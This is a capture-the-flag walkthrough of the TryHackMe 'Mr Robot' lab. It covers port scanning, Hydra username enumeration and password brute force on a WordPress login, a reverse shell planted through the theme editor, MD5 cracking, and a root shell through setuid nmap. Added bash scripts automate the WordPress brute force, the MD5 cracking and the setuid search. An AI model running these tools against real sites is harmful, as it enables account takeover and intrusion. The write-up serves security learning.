Mr Robot CTF
Connection to network
Connected to the TryHackMe network using the provided VPN configuration.
Nmap Scan
nmap -sC -sV **.**.*.*** -v | tee nmap/initial
(Without -p- this only covers nmap's default top 1000 TCP ports; a full-range scan would be the next step if these ports had led nowhere.)
Results
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_ Supported Methods: HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
| http-methods:
|_ Supported Methods: HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Issuer: commonName=www.example.com
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-09-16T10:45:03
| Not valid after: 2025-09-13T10:45:03
| MD5: 3c16 3b19 87c3 42ad 6634 c1c9 d0aa fb97
|_SHA-1: ef0c 5fa5 931a 09a5 687c a2c2 80c4 c792 07ce f71b
Directory brute force using gobuster
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u **.**.*.***
Nothing else of interest except the admin and login paths. Seems juicy! Let's check them.
http://**.**.*.***/login
redirects to http://**.**.*.***/wp-login.php
which is the WordPress login page. Given the word-list file found earlier, the plan is to brute-force our way in with it. Maybe both the username and the password come from that same list and we don't need rockyou.
I used Hydra to brute-force the username first. Trying usernames and passwords together is impractical, but a failed login tells us which half was wrong: WordPress answers "Invalid username." when the account does not exist and a different message when it does. That verbose error is a username-enumeration oracle, so we can walk the .dic file with a dummy password and stop when the message changes.
-$ hydra -L fsociety.dic -p test **.**.*.*** http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid username."
Hydra returned one username that exists.
Now brute-force again, fixing the username we found and using the same .dic file for the passwords:
-$ hydra -l Elliot -P fsociety.dic **.**.*.*** http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=The password you entered for the username"
This was taking a long time, and rockyou.txt did not work either. Looking at the .dic file, many passwords appear more than once, which is what makes it so slow. Let's keep only the unique entries and try again.
-$ sort -u fsociety.dic > filtered.dic
(sort -u already drops duplicates, so no separate uniq pass is needed.)
-$ hydra -l Elliot -P filtered.dic **.**.*.*** http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=The password you entered for the username"
After an hour, Hydra finally hit the password.
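As an added example (not part of the original write-up), here is the login oracle the two Hydra runs above depend on, spelled out with curl so the two error strings and the two-stage attack are explicit. It assumes the target URL is supplied in TARGET, that the form is /wp-login.php with the log/pwd fields, and that the install uses the default English WordPress error strings that the Hydra commands already match; fsociety.dic is the page's own name for the word list.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: the WordPress login
# oracle the two Hydra runs rely on, written out with curl.
# Assumptions (not stated on the page): target in $TARGET, login form at
# /wp-login.php with fields log/pwd, default English error strings.

TARGET="${TARGET:-http://target.invalid}"   # placeholder; set TARGET before use

# Classify one raw HTTP response (headers + body) from wp-login.php.
# Prints: success | nouser | badpass | unknown
classify_wp_response() {
    case "$1" in
        *wordpress_logged_in*)                         echo success ;;  # auth cookie was set
        *"Invalid username."*)                         echo nouser  ;;  # account does not exist
        *"The password you entered for the username"*) echo badpass ;;  # account exists
        *)                                             echo unknown ;;  # lockout plugin or other wording: stop and look
    esac
}

# POST one credential pair and classify the reply.
wp_login_probe() {
    resp=$(curl -s -i --max-time 10 \
        --data-urlencode "log=$1" --data-urlencode "pwd=$2" \
        --data "wp-submit=Log+In" "$TARGET/wp-login.php")
    classify_wp_response "$resp"
}

# Stage 1: the oracle answers nouser/badpass before any password check,
# so a dummy password is enough to find an existing account.
enumerate_user() {
    while IFS= read -r candidate; do
        [ -n "$candidate" ] || continue
        if [ "$(wp_login_probe "$candidate" test)" = badpass ]; then
            echo "$candidate"
            return 0
        fi
    done < "$1"
    return 1
}

# Stage 2: spray the deduplicated list as passwords for that user.
find_password() {
    user="$1"
    dedup=$(mktemp)
    sort -u "$2" > "$dedup"      # same fix as the filtered.dic step
    while IFS= read -r pass; do
        [ -n "$pass" ] || continue
        if [ "$(wp_login_probe "$user" "$pass")" = success ]; then
            echo "$pass"
            rm -f "$dedup"
            return 0
        fi
    done < "$dedup"
    rm -f "$dedup"
    return 1
}

# Usage: TARGET=http://<ip> ./wp_oracle.sh fsociety.dic
if [ -n "${1:-}" ]; then
    user=$(enumerate_user "$1") || { echo "no valid username in $1" >&2; exit 1; }
    echo "valid username: $user"
    pass=$(find_password "$user" "$1") && echo "password for $user: $pass"
fi
```

The weakness being exploited is the oracle itself: WordPress tells an unauthenticated client whether a username exists before any password is checked, so the account name leaks in one pass over the list and only the password then has to be guessed. An "unknown" verdict usually means a lockout or captcha plugin has kicked in, or the wording differs on that WordPress version; in that case stop and read the response rather than keep hammering.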
After logging in we land on the WordPress admin panel, which allows file uploads. Uploads, nice! Let's try to get a reverse shell in.
Uploading a PHP reverse shell through the media uploader did not work; variants like .php5 and .php.jpg either failed or were served as plain images. So I looked for other options and found the theme editor, which exposes the theme's own *.php files. The reverse-shell vector was sitting right there: I picked one of the theme's .php files and replaced its contents with the reverse-shell code. (On a hardened install, define('DISALLOW_FILE_EDIT', true); in wp-config.php removes this editor; here it was available.)
Then I started a netcat listener:
-$ nc -lvp 1234
and opened the edited theme file in the browser. Boom: a connection came back as a non-interactive reverse shell.
Listing /home/robot showed two files:
- key: readable only by the robot user.
- a raw-MD5 password hash file, which looks like it belongs to the robot user.
Cracking the MD5 with John the Ripper
-$ john --format=raw-md5 --wordlist=rockyou.txt <hashfile>
Found it! (raw-md5 is unsalted MD5, so a single wordlist run is all it takes.)
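As an added example (not part of the original write-up), this is what john's raw-md5 mode does, written out with md5sum so the cost model is visible: one MD5 per candidate, no salt, so a single pass over the wordlist covers every user at once. The user:hash line layout and the test wordlist are constructed for this example; the box's real hash file is not reproduced here.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: a wordlist attack on an
# unsalted MD5 hash, the same work `john --format=raw-md5` does.
# The "user:hash" layout handled below is an assumption of this example.

# Print the wordlist entry whose MD5 equals $1 (hex, either case); exit 1 if none.
crack_raw_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r candidate; do
        h=$(printf '%s' "$candidate" | md5sum | cut -d' ' -f1)
        if [ "$h" = "$target" ]; then
            echo "$candidate"
            return 0
        fi
    done < "$2"
    return 1
}

# Crack one "user:hash" line and print "user:password"; exit 1 if no match.
crack_user_hash_line() {
    user=${1%%:*}
    hash=${1#*:}
    pw=$(crack_raw_md5 "$hash" "$2") || return 1
    echo "$user:$pw"
}

# Usage: ./crack_md5.sh <user:hash> /usr/share/wordlists/rockyou.txt
if [ $# -eq 2 ]; then
    crack_user_hash_line "$1" "$2" || echo "no match in $2" >&2
fi
```

Because there is no salt, the same candidate hash is compared against every user in the file, and a precomputed table would work just as well; that is the property that makes raw-md5 password storage indefensible.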
Escalating to user robot
su into robot is not possible from the non-interactive shell, since su needs a terminal. Let's make the shell a bit more interactive.
Making an interactive shell with python
-$ python -c 'import pty;pty.spawn("/bin/sh")'
Becoming robot
-$ su robot
Now I can read the second key, since robot has read permission on it.
Escalating to root
Finding an escalation vector
I ran LinPEAS and it reported that nmap is a setuid-root executable. Nice: older nmap builds have an interactive mode that can spawn a shell, and that shell runs as root.
-$ nmap --interactive
nmap> !sh
Root. Now we can read the final key under /root, if it is there:
-$ cat /root/key-3-of-3.txt
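As an added example (not part of the original write-up), this is the setuid check LinPEAS performs, as a standalone function, plus a triage pass that flags binaries with a documented shell escape. The only assumption is the short ESCAPABLE list (a subset of GTFOBins); the rest is plain find(1). Version caveat for the nmap route used above: GTFOBins lists --interactive as available in nmap 2.02 through 5.21; on newer builds the equivalent is an NSE script containing os.execute("/bin/sh") passed via --script.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: enumerate setuid-root
# binaries and flag the ones with a known shell escape.
# Assumption: the ESCAPABLE list below (a short subset of GTFOBins).

# Basenames with a documented setuid shell escape.
ESCAPABLE="nmap vim vi find bash sh dash python python2 python3 perl awk less more nano cp mv env"

# Setuid-root regular files on local filesystems (skips network mounts).
list_suid() {
    find / -xdev -user root -perm -4000 -type f 2>/dev/null
}

# Read paths on stdin; print "<path> ESCAPABLE" for known escapes and
# "<path> review" for everything else. Exact basename match only, so a
# renamed binary such as vim.basic still needs a manual look.
triage_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        verdict=review
        for e in $ESCAPABLE; do
            if [ "$name" = "$e" ]; then
                verdict=ESCAPABLE
                break
            fi
        done
        echo "$path $verdict"
    done
}

# Number of ESCAPABLE hits for the paths on stdin.
count_escapable() {
    triage_suid | awk '$NF == "ESCAPABLE" { n++ } END { print n + 0 }'
}

# Usage on the target: ./suid_triage.sh scan
if [ "${1:-}" = scan ]; then
    list_suid | triage_suid
fi
```

Everything marked "review" still deserves a glance (a custom setuid helper is often the real bug), but the ESCAPABLE hits are the ones to try first, checking the binary's version against the escape before relying on it.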